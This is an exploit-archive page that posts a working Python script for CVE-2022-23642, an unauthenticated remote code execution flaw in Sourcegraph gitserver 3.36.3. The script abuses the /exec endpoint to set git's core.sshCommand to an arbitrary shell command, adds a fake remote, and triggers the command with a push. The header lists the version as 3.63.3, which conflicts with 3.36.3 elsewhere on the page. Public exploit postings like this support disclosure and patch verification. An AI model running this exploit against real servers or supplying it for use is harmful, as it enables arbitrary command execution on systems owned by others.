exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Sourcegraph Gitserver 3.36.3 Remote Code Execution

Sourcegraph Gitserver 3.36.3 Remote Code Execution
Posted Jun 20, 2022
Authored by Altelus

Sourcegraph Gitserver version 3.36.3 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2022-23642
SHA-256 | ee3b7d37bfe4486bd0f3cce9798a27ebb2b45cf81818291f4acb0d35f4d13d82

Sourcegraph Gitserver 3.36.3 Remote Code Execution

Change Mirror Download
# Exploit Title: Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)
# Date: 2022-06-10
# Exploit Author: Altelus
# Vendor Homepage: https://about.sourcegraph.com/
# Version: 3.63.3
# Tested on: Linux
# CVE : CVE-2022-23642
# Docker Container: sourcegraph/server:3.36.3

# Sourcegraph prior to 3.37.0 has a remote code execution vulnerability on its gitserver service.
# This is due to lack of restriction on git config execution thus "core.sshCommand" can be passed
# on the HTTP arguments which can contain arbitrary bash commands. Note that this is only possible
# if gitserver is exposed to the attacker. This is tested on Sourcegraph 3.36.3
#
# Exploitation parameters:
# - Exposed Sourcegraph gitserver
# - Existing repo on sourcegraph



import json
import argparse
import requests

def exploit(host, existing_git, cmd):

# setting sshCommand
data = {
"Repo" : existing_git,
"Args" : [
"config",
"core.sshCommand",
cmd
]
}

res = requests.get(host+"/exec", json=data).text

if len(res) > 0:
print("[-] Didn't work: {}".format(res))
exit(0)

# setting fake origin
data = {
"Repo" : existing_git,
"Args" : [
"remote",
"add",
"origin",
"git@lolololz:foo/bar.git"
]
}

res = requests.get(host+"/exec", json=data).text

if len(res) > 0:
print("[-] Didn't work: {}".format(res))
exit(0)

# triggering command using push
data = {
"Repo" : existing_git,
"Args" : [
"push",
"origin",
"master"
]
}

res = requests.get(host+"/exec", json=data).text

print("[*] Finished executing exploit")

parser = argparse.ArgumentParser()

parser.add_argument('--gitserver-host', required=True, help="Target Sourcegraph Gitserver Host")
parser.add_argument('--existing-git', required=True, help="e.g. Link of existing repository in target Sourcegraph")
parser.add_argument('--cmd', required=True, help="Command to run")
args = parser.parse_args()

host = args.gitserver_host
existing_git = args.existing_git
cmd = args.cmd


exploit(host, existing_git, cmd)

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close